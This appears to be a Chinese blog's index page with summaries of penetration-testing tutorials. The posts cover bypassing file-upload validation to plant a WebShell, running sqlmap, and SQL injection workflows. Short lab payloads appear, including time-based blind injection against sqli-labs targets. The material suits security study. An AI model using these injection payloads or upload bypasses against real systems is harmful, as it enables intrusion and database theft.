摘要：文件上传校验 前端校验（js校验） 服务器将代码发到客户端，浏览器进行校验。 服务器端校验 content-type类型分别 文件后缀 黑 白名单 1. 绕过前台脚本检测扩展名上传WebShell 进入浏览器about:config模式 关闭javascript.enabled选项关闭浏览器的js功 阅读全文

摘要：其他注入工具 明小子 穿山甲 啊D 确定注入点后测试 sqlmap.py -u http://localhost/sqli/Less-1/?id=1 root@kali:~# sqlmap -u http://192.168.2.12/sqli/Less-1/?id=1 当前数据库 sqlmap.p 阅读全文

摘要：if语句结构 if(条件（），真（），假（）) if(length(database())>10,sleep(3),1) 时间注入 库名长度： http://localhost/sqli/Less-2/?id=1 and if(length(database())>8,sleep(3),1)--+ 阅读全文

摘要：库操作 库名长度 http://localhost/sqli/Less-5/?id=1'and (length(database())=10)--+ 其他库长度 http://localhost/sqli/Less-5/?id=1'and (length((select schema_name fr 阅读全文

摘要：分类： 整型 字符型 联合查询 报错注入 布尔型盲注 时间型盲注 二次注入 堆叠注入 宽字节注入 注入流程： 测试注入点 判断闭合 测数列 order by 判断显示位 union select 1,2,3,4 查库名 union select 1,2,database() -- + 查表名 uni 阅读全文